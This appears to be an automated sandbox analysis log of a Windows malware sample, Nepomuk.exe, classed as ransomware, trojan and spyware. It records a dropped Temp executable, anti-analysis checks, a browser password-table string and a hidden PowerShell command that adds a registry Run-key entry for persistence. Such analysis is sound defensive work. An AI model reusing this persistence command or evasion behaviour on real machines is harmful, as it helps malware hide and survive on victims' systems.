                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358F4CF0_2_0358F4CF
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0359ACC00_2_0359ACC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357DCF00_2_0357DCF0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035584E00_2_035584E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357D49C0_2_0357D49C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03559CB00_2_03559CB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0357BCB20_2_0357BCB2
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_00951F007_2_00951F00
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009511107_2_00951110
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009517907_2_00951790
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009513A07_2_009513A0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D09807_2_018D0980
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_00951F0010_2_00951F00
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_0095111010_2_00951110
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_0095179010_2_00951790
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009513A010_2_009513A0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C098010_2_032C0980
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E098013_2_012E0980
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: String function: 03569520 appears 88 times
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: String function: 01568920 appears 88 times
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: String function: 0155A1F0 appears 76 times
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: String function: 0355ADF0 appears 40 times
                    Source: Nepomuk.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Nepomuk.exe Static PE information: Section: .data ZLIB complexity 0.9996369551512968
                    Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@14/10@5/11
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_00EF2380 GetSystemInfo,GlobalMemoryStatusEx,GetTickCount,GetTickCount,Sleep,GetTickCount,CreateToolhelp32Snapshot,Process32First,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Process32Next,CloseHandle
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_035917E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeFile created: C:\Users\user\AppData\Local\config
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                    Source: Nepomuk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Nepomuk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Nepomuk.exe, 00000000.00000003.1293800795.0000000003F1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Nepomuk.exeVirustotal: Detection: 48%
                    Source: Nepomuk.exeReversingLabs: Detection: 52%
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: ypl0SgV/addrselect.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: UCnSf0Mr7N/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: FNxKTCH/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile read: C:\Users\user\Desktop\Nepomuk.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\Nepomuk.exe "C:\Users\user\Desktop\Nepomuk.exe"
                    Source: C:\Users\user\Desktop\Nepomuk.exeProcess created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe"
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Nepomuk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation
                    Source: C:\Users\user\Desktop\Nepomuk.exeUnpacked PE file: 0.2.Nepomuk.exe.3550000.2.unpack
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_0158774A push edx; iretd 0_2_0158775A
                    Source: C:\Users\user\Desktop\Nepomuk.exe Code function: 0_2_0358834A push edx; iretd 0_2_0358835A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_034E7913 push 8BF07D89h; iretd 8_2_034E7918
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe File created: C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exe
                    Source: C:\Users\user\Desktop\Nepomuk.exe File created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
                    Source: C:\Users\user\Desktop\Nepomuk.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
